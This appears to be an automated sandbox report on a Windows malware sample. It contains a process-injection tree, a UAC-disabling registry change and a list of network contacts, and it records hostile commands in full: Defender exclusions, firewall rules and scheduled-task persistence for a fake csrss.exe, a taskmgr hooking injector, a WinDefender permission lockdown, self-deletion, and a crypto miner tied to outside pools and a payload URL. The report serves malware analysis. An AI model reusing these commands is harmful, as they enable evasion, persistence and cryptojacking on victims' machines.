PID 3192 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3192 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 3192 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 3192 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3192 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 760 wrote to memory of 2960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe
PID 760 wrote to memory of 2960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe
PID 760 wrote to memory of 2960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe
PID 760 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe
PID 760 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe
PID 760 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 1936 N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2156 wrote to memory of 2544 N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 2544 N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 2544 N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1936 wrote to memory of 2956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 760 wrote to memory of 4188 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe
PID 760 wrote to memory of 4188 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe
PID 760 wrote to memory of 4188 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe
PID 4188 wrote to memory of 5116 N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4188 wrote to memory of 5116 N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4188 wrote to memory of 5116 N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 4648 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe
PID 760 wrote to memory of 4648 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe
PID 760 wrote to memory of 4648 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe
PID 760 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe
PID 760 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe
PID 760 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe
PID 3468 wrote to memory of 2116 N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 2116 N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 2116 N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 3616 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe
PID 760 wrote to memory of 3616 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe
PID 760 wrote to memory of 3616 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe
PID 3616 wrote to memory of 2272 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe
PID 3616 wrote to memory of 2272 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe
PID 3616 wrote to memory of 2272 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe
PID 3616 wrote to memory of 2008 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe
PID 3616 wrote to memory of 2008 N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A

Uses Task Scheduler COM API

persistence

Processes

c:\windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe

"C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe

"C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe"

C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe

"C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 644

C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe

"C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe

"C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe"

C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe

"C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe

"C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe"

C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe

"C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe"

C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe

"C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe"

C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe

"C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe

"C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe"

C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe

"C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe

"C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe" --silent --allusers=0

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x6d14e1d0,0x6d14e1dc,0x6d14e1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PHdHLeuB5m5LNlcNnVsyRe83.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PHdHLeuB5m5LNlcNnVsyRe83.exe" --version

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe

"C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3896 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240329015451" --session-guid=6fbf4717-c4c0-46ce-ae1c-54af9d7fbeb1 --server-tracking-blob=(blob omitted) --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C04000000000000

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x6c7ce1d0,0x6c7ce1dc,0x6c7ce1e8

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe"

C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe

"C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x300040,0x30004c,0x300058

C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe

"C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe"

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=soothai2Aep2ohqu -m=https://cdn.discordapp.com/attachments/1220770485210710117/1220772642102054933/wVPjYUIbfZQwJs?ex=6610281e&is=65fdb31e&hm=ab675d89d9dcb78c3c9e04e8416260f60c6fc5d8ddedcab3944fe161191bb8b7& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 4850dfb6-954d-44e6-b05f-b6e92b21bbd9 --tls --nicehash -o showlock.net:443 --rig-id 4850dfb6-954d-44e6-b05f-b6e92b21bbd9 --tls --nicehash -o showlock.net:80 --rig-id 4850dfb6-954d-44e6-b05f-b6e92b21bbd9 --nicehash --http-port 3433 --http-access-token 4850dfb6-954d-44e6-b05f-b6e92b21bbd9 --randomx-wrmsr=-1

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe -hide 244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.68.143:443 pastebin.com tcp
US 172.67.169.89:443 yip.su tcp
DE 185.172.128.144:80 185.172.128.144 tcp
US 8.8.8.8:53 piramidglobaltobacco.id udp
US 8.8.8.8:53 shipofdestiny.com udp
AT 5.42.64.17:80 5.42.64.17 tcp
US 104.21.32.142:443 shipofdestiny.com tcp
SG 217.21.73.190:443 piramidglobaltobacco.id tcp
US 8.8.8.8:53 sty.ink udp
US 8.8.8.8:53 operandotwo.com udp
US 104.21.32.142:443 shipofdestiny.com tcp
US 8.8.8.8:53 namemail.org udp
US 8.8.8.8:53 cu82342.tw1.ru udp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.112:80 net.geo.opera.com tcp
RU 176.57.210.144:443 cu82342.tw1.ru tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 142.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 17.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 lawyerbuyer.org udp
US 104.21.63.71:443 lawyerbuyer.org tcp
US 104.21.15.5:443 operandotwo.com tcp
US 8.8.8.8:53 144.210.57.176.in-addr.arpa udp
US 8.8.8.8:53 190.73.21.217.in-addr.arpa udp
US 8.8.8.8:53 71.63.21.104.in-addr.arpa udp
US 8.8.8.8:53 guseman.org udp
US 172.67.173.167:443 guseman.org tcp
US 172.67.200.219:443 sty.ink tcp
US 172.67.200.219:443 sty.ink tcp
US 8.8.8.8:53 5.15.21.104.in-addr.arpa udp
US 8.8.8.8:53 219.200.67.172.in-addr.arpa udp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 241.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 167.173.67.172.in-addr.arpa udp
US 8.8.8.8:53 herdbescuitinjurywu.shop udp
US 172.67.206.194:443 herdbescuitinjurywu.shop tcp
